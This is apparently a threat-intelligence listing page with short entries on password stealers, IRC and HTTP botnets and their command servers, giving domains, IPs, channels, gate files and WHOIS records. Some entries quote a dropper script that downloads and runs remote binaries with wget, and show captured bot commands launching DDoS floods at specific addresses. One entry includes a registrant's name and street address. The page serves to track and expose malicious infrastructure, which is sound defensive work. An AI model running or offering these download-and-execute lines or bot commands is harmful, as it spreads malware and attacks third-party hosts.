This is spreading through torrents and cracks and looks like passwd stealer. Domains and ip’s used : makemegood24.com 213.165.83.176 e710e2.makemegood24.com 87.106.20.192 aaakemegood24.com 146.148.34.125 ww11.aaakemegood24.com 166.78.106.200 abakemegood24.com 74.208.153.9 acakemegood24.com 87.106.20.192 adakemegood24.com 213.165.83.176 aeakemegood24.com 74.208.164.166 afakemegood24.com perfectchoice1.com Read more...
185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)
Another SDT botnet found by abigail. Server : 185.61.138.235 Port : 443 Channel : #secgod DDOS Coming Up : <~Broken> >bot +std 70.127.120.174 80 30 [STD]Hitting 70.127.120.174! [STD]Done hitting 70.127.120.174! <~Broken> >bot +stop Killing pid 13923. Other url : http://93.174.93.45/f.sh #!/bin/sh cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh cd /tmp && wget http://93.174.93.45/mox64Read more...
191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)
Found by abigail Server : 191.235.178.122 Port 443 Channel : #sh DDOS Coming Up lol : <~Haze> >bot +std 172.56.41.67 80 120 [STD]Hitting 172.56.41.67! [STD]Hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! The Bot u can download it here. Other : http://5.152.206.162/getbinaries.sh #!/bin/sh # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOURRead more...
jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)
Domains used by the malware: 34324325kgkgfkgf.com dsffdsk323721372131.com fdshjfsh324332432.com jdsiwiqweiqwyreqwi.com 80.242.123.208 HTTP Requests: URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: jdsiwiqweiqwyreqwi.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples:Read more...
89.248.172.240(30k botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Botnet found by sPy. Only server and port no channels here because no exe file to see for more. Feel free to check for channels ur self. Connecting to 89.248.172.240 (6667) Invisible Users 12: 12 3554Operators: 2 operator(s) onlineChannels: 12 channels formedClients: I have 3555 clients and 0 serversLocal users: 3555 29989 Current local usersRead more...
Linux Botnet Hosted In blackunix.us
This is the bot used to scan for vulnerabilities: hxxp://pastebin.com/dEMULiQV Now talking in #botnets Topic On : [ #botnets ] [ hajar irc.predone.cz dan irc.drogs.pl ] Topic By : [ uyap ] Modes On : [ #botnets ] [ +smntrMuk fcuked ] The Bot is hosted here hxxp://visionafricamagazine.com/scripts/x.log
onetimes27s.com(Reverse Dns Bot hosted in Russian Federation Saint Petersburg Majordomo Llc)
This package was posted in one hacking board as http bot. After checking the file here results: Domains used : hoseen454r.com inactive onetimes27s.com active Resolved : [ onetimes27s.com ] To [ 178.250.245.186 ] Panel: hxxp://178.250.245.186/pref1/ password protected Sample here Hosting infos: http://whois.domaintools.com/178.250.245.186
gki2mpdt3rsokbmv.onion (Irc botnet hosted on a Tor hidden service)
Server: gki2mpdt3rsokbmv.onion Port: 6667 Channel: #channel Oper: [wac] (wac@9bedb2.host): ac[wac] #channel[wac] lair.hell.net :Cerberus Server[wac] idle 00:00:18, signon: Tue May 13 18:24:47[wac] End of WHOIS list. The owner must have used very old bot code to create this, as it fails to work properly on windows 7 and higher. Related md5s (Download sample from Malwr.com) Ircbot:Read more...
sinsec.net (Betabot http botnet hosted by alibabahost.com)
Resolved sinsec.net to 37.221.170.96 Server: sinsec.net Gate file: /turndown/order.php Alternate domains: divinestresser.info radicalpkz.com perp.pw thefox.pw uploadme.pw perp.se Domain info: sinsec.net Domain Name: SINSEC.NET Registry Domain ID: 1814650535_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.enom.com Registrar URL: www.enom.com Updated Date: 2013-07-12 10:27:24Z Creation Date: 2013-07-12 17:27:00Z Registrar Registration Expiration Date: 2014-07-12 17:27:00Z Registrar: ENOM, INC. Registrar IANA ID: 48Read more...
api.wifi-update.biz (Betabot http botnet hosted by oneandone.net)
Resolved api.wifi-update.biz to 87.106.241.22 Server: api.wifi-update.biz Gate file: /cdn/img.php Alternate domains: api-radio-def.de api.lul.pw api.tba.pw Domain info: wifi-update.biz Domain Name: WIFI-UPDATE.BIZ Domain ID: D58641421-BIZ Sponsoring Registrar: BIZCN.COM, INC. Sponsoring Registrar IANA ID: 471 Registrar URL (registration services): www.bizcn.com Domain Status: clientTransferProhibited Registrant ID: ORGEH90335606834 Registrant Name: Erkki Hagstrom Registrant Organization: ErkkiHagstrom Registrant Address1: Gesterbyntie 51 RegistrantRead more...